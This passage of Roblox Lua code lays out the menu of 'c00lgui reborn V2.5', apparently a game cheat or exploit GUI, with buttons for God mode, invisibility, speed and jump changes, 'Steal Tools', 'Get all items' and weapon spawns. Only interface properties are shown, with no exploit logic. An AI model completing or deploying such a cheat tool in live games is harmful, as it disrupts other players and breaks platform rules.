		FloatingPad.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		FloatingPad.BorderColor3 = Color3.fromRGB(255, 0, 0)
		FloatingPad.BorderSizePixel = 3
		FloatingPad.Position = UDim2.new(0.5, 3, 0, 99)
		FloatingPad.Size = UDim2.new(0.5, -3, 0, 30)
		FloatingPad.ZIndex = 2
		FloatingPad.Font = Enum.Font.SourceSans
		FloatingPad.Text = "Floating Pad"
		FloatingPad.TextColor3 = Color3.fromRGB(255, 255, 255)
		FloatingPad.TextSize = 14.000
	
		HeadShake.Name = "Head Shake"
		HeadShake.Parent = Scripts
		HeadShake.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		HeadShake.BorderColor3 = Color3.fromRGB(255, 0, 0)
		HeadShake.BorderSizePixel = 3
		HeadShake.Position = UDim2.new(0, 0, 0, 132)
		HeadShake.Size = UDim2.new(0.499000013, 0, 0, 30)
		HeadShake.ZIndex = 2
		HeadShake.Font = Enum.Font.SourceSans
		HeadShake.Text = "Head Shake NEED REANIM"
		HeadShake.TextColor3 = Color3.fromRGB(255, 255, 255)
		HeadShake.TextSize = 14.000
		HeadShake.TextWrapped = true
	
		NameTag.Name = "Name Tag"
		NameTag.Parent = Scripts
		NameTag.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		NameTag.BorderColor3 = Color3.fromRGB(255, 0, 0)
		NameTag.BorderSizePixel = 3
		NameTag.Position = UDim2.new(0.5, 3, 0, 132)
		NameTag.Size = UDim2.new(0.5, -3, 0, 30)
		NameTag.ZIndex = 2
		NameTag.Font = Enum.Font.SourceSans
		NameTag.Text = "Name Tag (FD)"
		NameTag.TextColor3 = Color3.fromRGB(255, 255, 255)
		NameTag.TextSize = 14.000
		NameTag.TextWrapped = true
	
		ControlNPCs.Name = "Control NPCs"
		ControlNPCs.Parent = Scripts
		ControlNPCs.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		ControlNPCs.BorderColor3 = Color3.fromRGB(255, 0, 0)
		ControlNPCs.BorderSizePixel = 3
		ControlNPCs.Position = UDim2.new(0, 0, 0, 165)
		ControlNPCs.Size = UDim2.new(0.5, 0, 0, 30)
		ControlNPCs.ZIndex = 2
		ControlNPCs.Font = Enum.Font.SourceSans
		ControlNPCs.Text = "Control NPCs"
		ControlNPCs.TextColor3 = Color3.fromRGB(255, 255, 255)
		ControlNPCs.TextSize = 14.000
	
		Getallitems.Name = "Get all items"
		Getallitems.Parent = Scripts
		Getallitems.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Getallitems.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Getallitems.BorderSizePixel = 3
		Getallitems.Position = UDim2.new(0.5, 3, 0, 165)
		Getallitems.Size = UDim2.new(0.5, -3, 0, 30)
		Getallitems.ZIndex = 2
		Getallitems.Font = Enum.Font.SourceSans
		Getallitems.Text = "Get all items"
		Getallitems.TextColor3 = Color3.fromRGB(255, 255, 255)
		Getallitems.TextSize = 14.000
	
		Blackhole.Name = "Black hole"
		Blackhole.Parent = Scripts
		Blackhole.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Blackhole.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Blackhole.BorderSizePixel = 3
		Blackhole.Position = UDim2.new(0, 0, 0, 198)
		Blackhole.Size = UDim2.new(0.5, 0, 0, 30)
		Blackhole.ZIndex = 2
		Blackhole.Font = Enum.Font.SourceSans
		Blackhole.Text = "Black Hole"
		Blackhole.TextColor3 = Color3.fromRGB(255, 255, 255)
		Blackhole.TextSize = 14.000
		Blackhole.TextWrapped = true
	
		WalkOnWalls.Name = "Walk On Walls"
		WalkOnWalls.Parent = Scripts
		WalkOnWalls.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		WalkOnWalls.BorderColor3 = Color3.fromRGB(255, 0, 0)
		WalkOnWalls.BorderSizePixel = 3
		WalkOnWalls.Position = UDim2.new(0.5, 3, 0, 198)
		WalkOnWalls.Size = UDim2.new(0.479999989, 0, 0, 30)
		WalkOnWalls.ZIndex = 2
		WalkOnWalls.Font = Enum.Font.SourceSans
		WalkOnWalls.Text = "Walk On Walls"
		WalkOnWalls.TextColor3 = Color3.fromRGB(255, 255, 255)
		WalkOnWalls.TextSize = 14.000
		WalkOnWalls.TextWrapped = true
	
		Title_2.Name = "Title"
		Title_2.Parent = Scripts
		Title_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_2.BorderSizePixel = 3
		Title_2.Size = UDim2.new(1, 0, 0, 30)
		Title_2.ZIndex = 2
		Title_2.Font = Enum.Font.SourceSansBold
		Title_2.Text = "Scripts"
		Title_2.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_2.TextSize = 14.000
	
		SCP173.Name = "SCP 173"
		SCP173.Parent = Scripts
		SCP173.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		SCP173.BorderColor3 = Color3.fromRGB(255, 0, 0)
		SCP173.BorderSizePixel = 3
		SCP173.Position = UDim2.new(0.5, 3, 0.326530606, 132)
		SCP173.Size = UDim2.new(0.5, -3, 0, 30)
		SCP173.ZIndex = 2
		SCP173.Font = Enum.Font.SourceSans
		SCP173.Text = "SCP 173 (X TOGGLE)"
		SCP173.TextColor3 = Color3.fromRGB(255, 255, 255)
		SCP173.TextSize = 14.000
		SCP173.TextWrapped = true
	
		SCP106.Name = "SCP 106"
		SCP106.Parent = Scripts
		SCP106.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		SCP106.BorderColor3 = Color3.fromRGB(255, 0, 0)
		SCP106.BorderSizePixel = 3
		SCP106.Position = UDim2.new(0, 0, 0, 228)
		SCP106.Size = UDim2.new(0.5, 0, 0, 30)
		SCP106.ZIndex = 2
		SCP106.Font = Enum.Font.SourceSans
		SCP106.Text = "SCP 106 (Z)"
		SCP106.TextColor3 = Color3.fromRGB(255, 255, 255)
		SCP106.TextSize = 14.000
		SCP106.TextWrapped = true
	
		Title_3.Name = "Title"
		Title_3.Parent = Page1
		Title_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_3.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_3.BorderSizePixel = 3
		Title_3.Position = UDim2.new(-0.0011353048, 0, 0.897656918, 0)
		Title_3.Size = UDim2.new(1.00113535, 0, 0, 30)
		Title_3.ZIndex = 2
		Title_3.Font = Enum.Font.SourceSansBold
		Title_3.Text = "Page 1"
		Title_3.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_3.TextSize = 14.000
	
		Settings.Name = "Settings"
		Settings.Parent = Frame
		Settings.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Settings.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Settings.BorderSizePixel = 3
		Settings.Position = UDim2.new(1, 3, 0, 0)
		Settings.Size = UDim2.new(1, 0, 1, 0)
	
		Page1_2.Name = "Page1"
		Page1_2.Parent = Settings
		Page1_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Page1_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Page1_2.BorderSizePixel = 3
		Page1_2.Position = UDim2.new(0, 0, 0, 83)
		Page1_2.Size = UDim2.new(1, 0, 1, -83)
	
		Walkspeed.Name = "Walkspeed"
		Walkspeed.Parent = Page1_2
		Walkspeed.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Walkspeed.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Walkspeed.BorderSizePixel = 3
		Walkspeed.Position = UDim2.new(0, 0, 0, 69)
		Walkspeed.Size = UDim2.new(0.5, 0, 0, 63)
	
		TextBox.Parent = Walkspeed
		TextBox.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextBox.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextBox.BorderSizePixel = 3
		TextBox.Position = UDim2.new(0, 0, 0.5, 0)
		TextBox.Size = UDim2.new(0.99000001, 1, 0.5, -1)
		TextBox.Font = Enum.Font.SourceSans
		TextBox.Text = ""
		TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextBox.TextSize = 14.000
	
		Title_4.Name = "Title"
		Title_4.Parent = Walkspeed
		Title_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_4.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_4.BorderSizePixel = 3
		Title_4.Size = UDim2.new(1, 0, 0, 30)
		Title_4.Font = Enum.Font.SourceSansBold
		Title_4.Text = "WalkSpeed"
		Title_4.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_4.TextSize = 14.000
	
		TextButton.Parent = Walkspeed
		TextButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton.BorderSizePixel = 3
		TextButton.Position = UDim2.new(0, 0, 1.09523809, 0)
		TextButton.Size = UDim2.new(0, 150, 0, 30)
		TextButton.Font = Enum.Font.SourceSans
		TextButton.Text = "Set WalkSpeed"
		TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton.TextSize = 14.000
	
		God.Name = "God"
		God.Parent = Page1_2
		God.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		God.BorderColor3 = Color3.fromRGB(255, 0, 0)
		God.BorderSizePixel = 3
		God.Position = UDim2.new(0, 0, 0, 3)
		God.Size = UDim2.new(0.5, 0, 0, 63)
	
		TextButton_2.Parent = God
		TextButton_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_2.BorderSizePixel = 3
		TextButton_2.Position = UDim2.new(0, 0, 0.5, 0)
		TextButton_2.Size = UDim2.new(0.99000001, 1, 0.5, -1)
		TextButton_2.Font = Enum.Font.SourceSans
		TextButton_2.Text = "Enable"
		TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_2.TextSize = 14.000
	
		Title_5.Name = "Title"
		Title_5.Parent = God
		Title_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_5.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_5.BorderSizePixel = 3
		Title_5.Size = UDim2.new(1, 0, 0, 30)
		Title_5.Font = Enum.Font.SourceSansBold
		Title_5.Text = "God"
		Title_5.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_5.TextSize = 14.000
		Title_5.TextWrapped = true
	
		Invisibility.Name = "Invisibility"
		Invisibility.Parent = Page1_2
		Invisibility.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Invisibility.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Invisibility.BorderSizePixel = 3
		Invisibility.Position = UDim2.new(0.5, 3, -0.406940073, 132)
		Invisibility.Size = UDim2.new(0.5, -3, 0, 63)
	
		TextButton_3.Parent = Invisibility
		TextButton_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_3.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_3.BorderSizePixel = 3
		TextButton_3.Position = UDim2.new(0, 0, 0.5, 0)
		TextButton_3.Size = UDim2.new(0.99000001, 1, 0.5, -1)
		TextButton_3.Font = Enum.Font.SourceSans
		TextButton_3.Text = "Enable"
		TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_3.TextSize = 14.000
	
		Title_6.Name = "Title"
		Title_6.Parent = Invisibility
		Title_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_6.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_6.BorderSizePixel = 3
		Title_6.Size = UDim2.new(1, 0, 0, 30)
		Title_6.Font = Enum.Font.SourceSansBold
		Title_6.Text = "Invisibility"
		Title_6.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_6.TextSize = 14.000
		Title_6.TextWrapped = true
	
		JumpPower.Name = "JumpPower"
		JumpPower.Parent = Page1_2
		JumpPower.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		JumpPower.BorderColor3 = Color3.fromRGB(255, 0, 0)
		JumpPower.BorderSizePixel = 3
		JumpPower.Position = UDim2.new(0, 153, 0, 69)
		JumpPower.Size = UDim2.new(0.49000001, 0, 0, 63)
	
		TextBox_2.Parent = JumpPower
		TextBox_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextBox_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextBox_2.BorderSizePixel = 3
		TextBox_2.Position = UDim2.new(0, 0, 0.5, 0)
		TextBox_2.Size = UDim2.new(0.99000001, 1, 0.5, -1)
		TextBox_2.Font = Enum.Font.SourceSans
		TextBox_2.Text = ""
		TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextBox_2.TextSize = 14.000
	
		Title_7.Name = "Title"
		Title_7.Parent = JumpPower
		Title_7.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_7.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_7.BorderSizePixel = 3
		Title_7.Size = UDim2.new(1, 0, 0, 30)
		Title_7.Font = Enum.Font.SourceSansBold
		Title_7.Text = "JumpPower"
		Title_7.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_7.TextSize = 14.000
	
		TextButton_4.Parent = JumpPower
		TextButton_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_4.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_4.BorderSizePixel = 3
		TextButton_4.Position = UDim2.new(0, 0, 1.09523809, 0)
		TextButton_4.Size = UDim2.new(0, 147, 0, 30)
		TextButton_4.Font = Enum.Font.SourceSans
		TextButton_4.Text = "Set JumpPower"
		TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_4.TextSize = 14.000
	
		Title_8.Name = "Title"
		Title_8.Parent = Page1_2
		Title_8.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_8.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_8.BorderSizePixel = 3
		Title_8.Position = UDim2.new(0, 0, 0.831689894, 0)
		Title_8.Size = UDim2.new(0.998433411, 0, 0, 30)
		Title_8.ZIndex = 2
		Title_8.Font = Enum.Font.SourceSansBold
		Title_8.Text = "Page 1"
		Title_8.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_8.TextSize = 14.000
	
		Netless.Name = "Netless"
		Netless.Parent = Page1_2
		Netless.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Netless.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Netless.BorderSizePixel = 3
		Netless.Position = UDim2.new(0, 0, 0, 174)
		Netless.Size = UDim2.new(0.5, 0, 0, 63)
	
		TextButton_5.Parent = Netless
		TextButton_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_5.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_5.BorderSizePixel = 3
		TextButton_5.Position = UDim2.new(0, 0, 0.5, 0)
		TextButton_5.Size = UDim2.new(0.99000001, 1, 0.5, -1)
		TextButton_5.Font = Enum.Font.SourceSans
		TextButton_5.Text = "Enable"
		TextButton_5.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_5.TextSize = 14.000
	
		Title_9.Name = "Title"
		Title_9.Parent = Netless
		Title_9.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_9.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_9.BorderSizePixel = 3
		Title_9.Size = UDim2.new(1, 0, 0, 30)
		Title_9.Font = Enum.Font.SourceSansBold
		Title_9.Text = "Netless"
		Title_9.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_9.TextSize = 14.000
		Title_9.TextWrapped = true
	
		c00lguireawakened.Name = "c00lgui reawakened"
		c00lguireawakened.Parent = Page1_2
		c00lguireawakened.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		c00lguireawakened.BorderColor3 = Color3.fromRGB(255, 0, 0)
		c00lguireawakened.BorderSizePixel = 3
		c00lguireawakened.Position = UDim2.new(0, 153, 0, 174)
		c00lguireawakened.Size = UDim2.new(0.5, 0, 0, 63)
	
		TextButton_6.Parent = c00lguireawakened
		TextButton_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_6.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_6.BorderSizePixel = 3
		TextButton_6.Position = UDim2.new(0, 0, 0.5, 0)
		TextButton_6.Size = UDim2.new(0.99000001, 1, 0.5, -1)
		TextButton_6.Font = Enum.Font.SourceSans
		TextButton_6.Text = "Enable (will exit c00lgui)"
		TextButton_6.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_6.TextSize = 14.000
	
		Title_10.Name = "Title"
		Title_10.Parent = c00lguireawakened
		Title_10.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_10.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_10.BorderSizePixel = 3
		Title_10.Size = UDim2.new(1, 0, 0, 30)
		Title_10.Font = Enum.Font.SourceSansBold
		Title_10.Text = "c00lgui reawakened"
		Title_10.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_10.TextSize = 14.000
		Title_10.TextWrapped = true
	
		TextButton_7.Name = ">"
		TextButton_7.Parent = Settings
		TextButton_7.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_7.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_7.BorderSizePixel = 3
		TextButton_7.Position = UDim2.new(0.5, 3, 0, 40)
		TextButton_7.Size = UDim2.new(0.5, -3, 0, 40)
		TextButton_7.Font = Enum.Font.SourceSans
		TextButton_7.Text = ">"
		TextButton_7.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_7.TextSize = 48.000
	
		TextButton_8.Name = "<"
		TextButton_8.Parent = Settings
		TextButton_8.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TextButton_8.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TextButton_8.BorderSizePixel = 3
		TextButton_8.Position = UDim2.new(0, 0, 0, 40)
		TextButton_8.Size = UDim2.new(0.5, 0, 0, 40)
		TextButton_8.Font = Enum.Font.SourceSans
		TextButton_8.Text = "<"
		TextButton_8.TextColor3 = Color3.fromRGB(255, 255, 255)
		TextButton_8.TextSize = 48.000
	
		Title_11.Name = "Title"
		Title_11.Parent = Settings
		Title_11.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_11.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_11.BorderSizePixel = 3
		Title_11.Size = UDim2.new(1, 0, 0, 40)
		Title_11.Font = Enum.Font.SourceSans
		Title_11.Text = "Settings"
		Title_11.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_11.TextSize = 24.000
	
		Credits.Name = "Credits"
		Credits.Parent = Settings
		Credits.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Credits.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Credits.BorderSizePixel = 3
		Credits.Position = UDim2.new(-0.0116654038, 3, 0, 380)
		Credits.Size = UDim2.new(0, 300, 0, 20)
		Credits.ZIndex = 3
		Credits.Font = Enum.Font.SourceSans
		Credits.Text = "Made by rusello25"
		Credits.TextColor3 = Color3.fromRGB(65025, 65025, 65025)
		Credits.TextSize = 18.000
	
		idk.Name = "idk"
		idk.Parent = Settings
		idk.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		idk.BorderColor3 = Color3.fromRGB(255, 0, 0)
		idk.BorderSizePixel = 3
		idk.Position = UDim2.new(0.988334537, 3, -0.949999988, 380)
		idk.Size = UDim2.new(0, 27, 0, 400)
		idk.ZIndex = 3
		idk.Font = Enum.Font.SourceSans
		idk.Text = "<"
		idk.TextColor3 = Color3.fromRGB(65025, 65025, 65025)
		idk.TextSize = 50.000
	
		Next.Name = "Next"
		Next.Parent = Frame
		Next.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Next.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Next.BorderSizePixel = 3
		Next.Position = UDim2.new(0.5, 3, 0, 40)
		Next.Size = UDim2.new(0.5, -3, 0, 40)
		Next.ZIndex = 2
		Next.Font = Enum.Font.SourceSans
		Next.Text = ">"
		Next.TextColor3 = Color3.fromRGB(255, 255, 255)
		Next.TextSize = 48.000
	
		Previous.Name = "Previous"
		Previous.Parent = Frame
		Previous.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Previous.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Previous.BorderSizePixel = 3
		Previous.Position = UDim2.new(0, 0, 0, 40)
		Previous.Size = UDim2.new(0.5, -3, 0, 40)
		Previous.ZIndex = 2
		Previous.Font = Enum.Font.SourceSans
		Previous.Text = "<"
		Previous.TextColor3 = Color3.fromRGB(255, 255, 255)
		Previous.TextSize = 48.000
	
		Title_12.Name = "Title"
		Title_12.Parent = Frame
		Title_12.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_12.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_12.BorderSizePixel = 3
		Title_12.Size = UDim2.new(1, 0, 0, 40)
		Title_12.ZIndex = 2
		Title_12.Font = Enum.Font.SourceSans
		Title_12.Text = "c00lgui reborn V2.5 by rusello25"
		Title_12.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_12.TextSize = 24.000
	
		Page2.Name = "Page2"
		Page2.Parent = Frame
		Page2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Page2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Page2.BorderSizePixel = 3
		Page2.Position = UDim2.new(0, 0, 0, 83)
		Page2.Size = UDim2.new(1, 0, 1, -106)
		Page2.Visible = false
		Page2.ZIndex = 2
	
		GearTools.Name = "Gear/Tools"
		GearTools.Parent = Page2
		GearTools.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		GearTools.BorderColor3 = Color3.fromRGB(255, 0, 0)
		GearTools.BorderSizePixel = 3
		GearTools.Position = UDim2.new(0.5, 3, 0, 0)
		GearTools.Size = UDim2.new(0.5, -3, 1, 0)
		GearTools.ZIndex = 2
	
		SuicideGun.Name = "Suicide Gun"
		SuicideGun.Parent = GearTools
		SuicideGun.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		SuicideGun.BorderColor3 = Color3.fromRGB(255, 0, 0)
		SuicideGun.BorderSizePixel = 3
		SuicideGun.Position = UDim2.new(0, 0, 0, 33)
		SuicideGun.Size = UDim2.new(0.5, 0, 0, 30)
		SuicideGun.ZIndex = 2
		SuicideGun.Font = Enum.Font.SourceSans
		SuicideGun.Text = "Suicide Gun"
		SuicideGun.TextColor3 = Color3.fromRGB(255, 255, 255)
		SuicideGun.TextSize = 14.000
	
		GravityGun.Name = "Gravity Gun"
		GravityGun.Parent = GearTools
		GravityGun.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		GravityGun.BorderColor3 = Color3.fromRGB(255, 0, 0)
		GravityGun.BorderSizePixel = 3
		GravityGun.Position = UDim2.new(0.5, 3, 0, 33)
		GravityGun.Size = UDim2.new(0.5, -3, 0, 30)
		GravityGun.ZIndex = 2
		GravityGun.Font = Enum.Font.SourceSans
		GravityGun.Text = "Gravity Gun"
		GravityGun.TextColor3 = Color3.fromRGB(255, 255, 255)
		GravityGun.TextSize = 14.000
		GravityGun.TextWrapped = true
	
		StealTools.Name = "Steal Tools"
		StealTools.Parent = GearTools
		StealTools.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		StealTools.BorderColor3 = Color3.fromRGB(255, 0, 0)
		StealTools.BorderSizePixel = 3
		StealTools.Position = UDim2.new(0, 0, 0, 66)
		StealTools.Size = UDim2.new(0.5, 0, 0, 30)
		StealTools.ZIndex = 2
		StealTools.Font = Enum.Font.SourceSans
		StealTools.Text = "Steal Tools"
		StealTools.TextColor3 = Color3.fromRGB(255, 255, 255)
		StealTools.TextSize = 14.000
		StealTools.TextWrapped = true
	
		DevUzi.Name = "Dev Uzi"
		DevUzi.Parent = GearTools
		DevUzi.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		DevUzi.BorderColor3 = Color3.fromRGB(255, 0, 0)
		DevUzi.BorderSizePixel = 3
		DevUzi.Position = UDim2.new(0.5, 3, 0, 66)
		DevUzi.Size = UDim2.new(0.5, -3, 0, 30)
		DevUzi.ZIndex = 2
		DevUzi.Font = Enum.Font.SourceSans
		DevUzi.Text = "Dev Uzi"
		DevUzi.TextColor3 = Color3.fromRGB(255, 255, 255)
		DevUzi.TextSize = 14.000
	
		M4Carbine.Name = "M4 Carbine"
		M4Carbine.Parent = GearTools
		M4Carbine.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		M4Carbine.BorderColor3 = Color3.fromRGB(255, 0, 0)
		M4Carbine.BorderSizePixel = 3
		M4Carbine.Position = UDim2.new(0, 0, 0, 99)
		M4Carbine.Size = UDim2.new(0.5, 0, 0, 30)
		M4Carbine.ZIndex = 2
		M4Carbine.Font = Enum.Font.SourceSans
		M4Carbine.Text = "M4 Carbine"
		M4Carbine.TextColor3 = Color3.fromRGB(255, 255, 255)
		M4Carbine.TextSize = 14.000
	
		Uzi.Name = "Uzi"
		Uzi.Parent = GearTools
		Uzi.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Uzi.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Uzi.BorderSizePixel = 3
		Uzi.Position = UDim2.new(0.5, 3, 0, 99)
		Uzi.Size = UDim2.new(0.5, -3, 0, 30)
		Uzi.ZIndex = 2
		Uzi.Font = Enum.Font.SourceSans
		Uzi.Text = "Uzi"
		Uzi.TextColor3 = Color3.fromRGB(255, 255, 255)
		Uzi.TextSize = 14.000
		Uzi.TextWrapped = true
	
		AK47.Name = "AK47"
		AK47.Parent = GearTools
		AK47.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		AK47.BorderColor3 = Color3.fromRGB(255, 0, 0)
		AK47.BorderSizePixel = 3
		AK47.Position = UDim2.new(0, 0, 0, 132)
		AK47.Size = UDim2.new(0.5, 0, 0, 30)
		AK47.ZIndex = 2
		AK47.Font = Enum.Font.SourceSans
		AK47.Text = "AK47"
		AK47.TextColor3 = Color3.fromRGB(255, 255, 255)
		AK47.TextSize = 14.000
	
		M3GreaseGun.Name = "M3 Grease Gun"
		M3GreaseGun.Parent = GearTools
		M3GreaseGun.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		M3GreaseGun.BorderColor3 = Color3.fromRGB(255, 0, 0)
		M3GreaseGun.BorderSizePixel = 3
		M3GreaseGun.Position = UDim2.new(0.5, 3, 0, 132)
		M3GreaseGun.Size = UDim2.new(0.5, -3, 0, 30)
		M3GreaseGun.ZIndex = 2
		M3GreaseGun.Font = Enum.Font.SourceSans
		M3GreaseGun.Text = "M3 Grease Gun"
		M3GreaseGun.TextColor3 = Color3.fromRGB(255, 255, 255)
		M3GreaseGun.TextSize = 14.000
		M3GreaseGun.TextWrapped = true
	
		Empty.Name = "Empty"
		Empty.Parent = GearTools
		Empty.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty.BorderSizePixel = 3
		Empty.Position = UDim2.new(0, 0, 0, 165)
		Empty.Size = UDim2.new(0.499000013, 0, 0, 30)
		Empty.ZIndex = 2
		Empty.Font = Enum.Font.SourceSans
		Empty.Text = "Empty"
		Empty.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty.TextSize = 14.000
	
		Empty_2.Name = "Empty"
		Empty_2.Parent = GearTools
		Empty_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_2.BorderSizePixel = 3
		Empty_2.Position = UDim2.new(0.5, 3, 0, 165)
		Empty_2.Size = UDim2.new(0.5, -3, 0, 30)
		Empty_2.ZIndex = 2
		Empty_2.Font = Enum.Font.SourceSans
		Empty_2.Text = "Empty"
		Empty_2.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_2.TextSize = 14.000
	
		Empty_3.Name = "Empty"
		Empty_3.Parent = GearTools
		Empty_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_3.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_3.BorderSizePixel = 3
		Empty_3.Position = UDim2.new(0, 0, 0, 198)
		Empty_3.Size = UDim2.new(0.499000013, 0, 0, 30)
		Empty_3.ZIndex = 3
		Empty_3.Font = Enum.Font.SourceSans
		Empty_3.Text = "Empty"
		Empty_3.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_3.TextSize = 14.000
		Empty_3.TextWrapped = true
	
		Empty_4.Name = "Empty"
		Empty_4.Parent = GearTools
		Empty_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_4.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_4.BorderSizePixel = 3
		Empty_4.Position = UDim2.new(0.5, 3, 0, 198)
		Empty_4.Size = UDim2.new(0.5, -3, 0, 30)
		Empty_4.ZIndex = 2
		Empty_4.Font = Enum.Font.SourceSans
		Empty_4.Text = "Empty"
		Empty_4.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_4.TextSize = 14.000
	
		Title_13.Name = "Title"
		Title_13.Parent = GearTools
		Title_13.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_13.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_13.BorderSizePixel = 3
		Title_13.Size = UDim2.new(1, 0, 0, 30)
		Title_13.ZIndex = 2
		Title_13.Font = Enum.Font.SourceSansBold
		Title_13.Text = "Gear/Tools"
		Title_13.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_13.TextSize = 14.000
	
